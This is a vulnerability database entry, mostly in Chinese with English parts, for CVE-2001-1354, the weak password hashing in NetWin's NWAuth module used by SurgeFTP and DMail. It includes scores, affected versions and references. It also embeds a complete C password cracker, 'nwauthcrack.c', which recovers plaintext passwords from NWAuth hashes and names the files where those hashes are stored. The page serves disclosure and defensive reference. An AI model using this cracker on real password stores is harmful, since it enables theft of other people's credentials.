CVE-2001-1354
CVSS4.6
发布时间 :2001-07-20 00:00:00
修订时间 :2008-09-05 16:26:20
NMCOES    

[原文]NetWin Authentication module (NWAuth) 2.0 and 3.0b, as implemented in SurgeFTP, DMail, and possibly other packages, uses weak password hashing, which could allow local users to decrypt passwords or use a different password that has the same hash value as the correct password.


[CNNVD]Netwin NWAuth 脆弱密码加密漏洞(CNNVD-200107-131)

        CVE(CAN) ID: CAN-2001-1354
        
        
        
        NWAuth是Netwin的外部认证模块,被好几个Netwin的产品所采用。
        
        
        
        NWAuth使用了一个简单的单向HASH函数对密码进行加密,因此攻击者很容易对这些密码
        
        进行解密。
        
        
        
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:netwin:dmail:2.7
cpe:/a:netwin:dmail:2.8g
cpe:/a:netwin:dmail:2.5d
cpe:/a:netwin:dmail:2.8f
cpe:/a:netwin:dmail:2.8e
cpe:/a:netwin:dmail:2.7q
cpe:/a:netwin:surgeftp:1.0b
cpe:/a:netwin:dmail:2.8h
cpe:/a:netwin:dmail:2.7r
cpe:/a:netwin:dmail:2.8i
cpe:/a:netwin:surgeftp:2.0b
cpe:/a:netwin:surgeftp:2.0a

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1354
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1354
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-131
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/6866.php
(VENDOR_ADVISORY)  XF  netwin-nwauth-weak-encryption(6866)
http://www.securityfocus.com/bid/3075
(VENDOR_ADVISORY)  BID  3075
http://online.securityfocus.com/archive/1/198293
(VENDOR_ADVISORY)  BUGTRAQ  20010720 NetWin Authentication Module 3.0b password storage vulnerabilities / buffer overflows

- 漏洞信息

Netwin NWAuth 脆弱密码加密漏洞
中危 设计错误
2001-07-20 00:00:00 2005-10-20 00:00:00
本地  
        CVE(CAN) ID: CAN-2001-1354
        
        
        
        NWAuth是Netwin的外部认证模块,被好几个Netwin的产品所采用。
        
        
        
        NWAuth使用了一个简单的单向HASH函数对密码进行加密,因此攻击者很容易对这些密码
        
        进行解密。
        
        
        
        

- 公告与补丁

        
        
        厂商补丁:
        
        
        
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
        
        的主页以获取最新版本:
        
        
        http://netwinsite.com/

        

- 漏洞信息 (21020)

NetWin DMail 2.x,SurgeFTP 1.0/2.0 Weak Password Encryption Vulnerability (EDBID:21020)
multiple local
2001-07-20 Verified
0 byterage
N/A [点击下载]
source: http://www.securityfocus.com/bid/3075/info

The Netwin Authentication module, or NWAuth, is an external authentication module used by several Netwin products.

A simple one-way hash function is used by NWAuth to perform password encryption operations. As a result, it is trivial for an attacker to compose a list of possible plaintext values or perform some other brute force attack against the data encrypted using the scheme. 

/********************************************************************
 * nwauthcrack.c - NetWin Authentication Module password cracker    *
 * the SurgeFTP encrypted passwords can be found in the admin.dat & *
 * nwauth.clg files in the nwauth.exe directory                     *
 * by [ByteRage] <byterage@yahoo.com> [http://www.byterage.cjb.net] *
 ********************************************************************/

#include <string.h>
#include <stdio.h>

FILE *fh;
/* the following table indices refer to the characters our
   generated password may consist of (true/false), since
   we don't want to go into too much trouble when typing
   everything in :) */
const char okaychars[256] = {
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
};

/* DECRYPTION ALGORITHMS */
int enumpwds(unsigned char encrypted[]) {
  int heavycrypt0;
  unsigned int num=0, i, x;
  unsigned char j[256], decrypted[256];
  for(i=0; i<256;i++) { j[i] = 0; }
brute:
  heavycrypt0 = (unsigned char)encrypted[1]*255+(unsigned char)encrypted[0];
  for(i=0; i+2 < strlen(encrypted); i++) {
    for(x=j[i]; x < 256; x++) {
	  if ((x * (heavycrypt0+1) % 40 == (encrypted[i+2]-0x41)) & okaychars[x]) {
	    decrypted[i] = x;
		break;
	  }
    }
	if (x == 256) {
next:
	  if (i == 0) return num;
	  if (j[i-1] < 256) { j[i-1] = decrypted[i-1]+1; x = i; } else { i--; goto next; }
	  for (i=x; i < 256; i++) { j[i] = 0; }
	  goto brute;
	}
	heavycrypt0 += x; heavycrypt0 *= 3; heavycrypt0 %= 0x7D00;
  }
  decrypted[i] = '\x00';
  num++;
  printf("%s\n", decrypted);  
  if (j[i-1] < 256) { j[i-1] = decrypted[i-1]+1; x = i; } else { i--; goto next; }
  for (i=x; i < 256; i++) { j[i] = 0; }
  goto brute;
}
/* DECRYPTION ALGORITHMS END */

void main(int argc, char ** argv) {
  char buf[256]; int k, l;

  printf("NetWin Authentication Module password cracker by [ByteRage]\n\n");
  
  if (argc < 2) { printf("Syntax : %s <password>\n", argv[0]); return; }
  printf("%s ->\n",argv[1]);
  
  printf("\n%d passwords found for %s\n",enumpwds(argv[1]),argv[1]);
}
		

- 漏洞信息

5559
NetWin Authentication Module Weak Password Encryption
Local Access Required Cryptographic, Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

NetWin's NWAuth authentication module contains a flaw that may lead to an unauthorized password exposure. It is possible for a local user to gain access to plaintext passwords using brute force techniques, and it is possible for several passwords to match a given hash, which may lead to a loss of confidentiality.

- 时间线

2001-07-20 Unknow
2001-07-20 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Netwin NWAuth Weak Password Encryption Vulnerability
Design Error 3075
No No
2001-07-20 12:00:00 2009-07-11 06:56:00
Reported to Bugtraq by ByteRage <byterage@yahoo.com> on July 20, 2001.

- 受影响的程序版本

NetWin SurgeFTP 2.0 b
- Debian Linux 2.2
- Mandriva Linux Mandrake 7.2
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 7.0
- S.u.S.E. Linux 7.0
- Sun Solaris 8_sparc
- Sun Solaris 7.0
NetWin SurgeFTP 2.0 a
- Debian Linux 2.2
- Mandriva Linux Mandrake 7.2
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 7.0
- S.u.S.E. Linux 7.0
- Sun Solaris 8_sparc
- Sun Solaris 7.0
NetWin SurgeFTP 1.0 b
- Debian Linux 2.2
- Mandriva Linux Mandrake 7.2
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- RedHat Linux 7.0
- S.u.S.E. Linux 7.0
- Slackware Linux 7.0
- Sun Solaris 8_sparc
- Sun Solaris 7.0
NetWin DMail 2.8 i
NetWin DMail 2.8 h
NetWin DMail 2.8 g
NetWin DMail 2.8 f
NetWin DMail 2.8 e
NetWin DMail 2.7 r
NetWin DMail 2.7 q
NetWin DMail 2.7
NetWin DMail 2.5 d
- Apple Mac OS 9 9.0
- BSDI BSD/OS 4.0.1
- Digital OSF/1 3.2
- FreeBSD FreeBSD 5.0
- HP HP-UX 11.0 4
- IBM AIX 4.3.2
- Linux kernel 2.2 .x
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- Sun Solaris 8_sparc

- 漏洞讨论

The Netwin Authentication module, or NWAuth, is an external authentication module used by several Netwin products.

A simple one-way hash function is used by NWAuth to perform password encryption operations. As a result, it is trivial for an attacker to compose a list of possible plaintext values or perform some other brute force attack against the data encrypted using the scheme.

- 漏洞利用

This brute force password cracker was submitted by ByteRage &lt;byterage@yahoo.com&gt;:

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站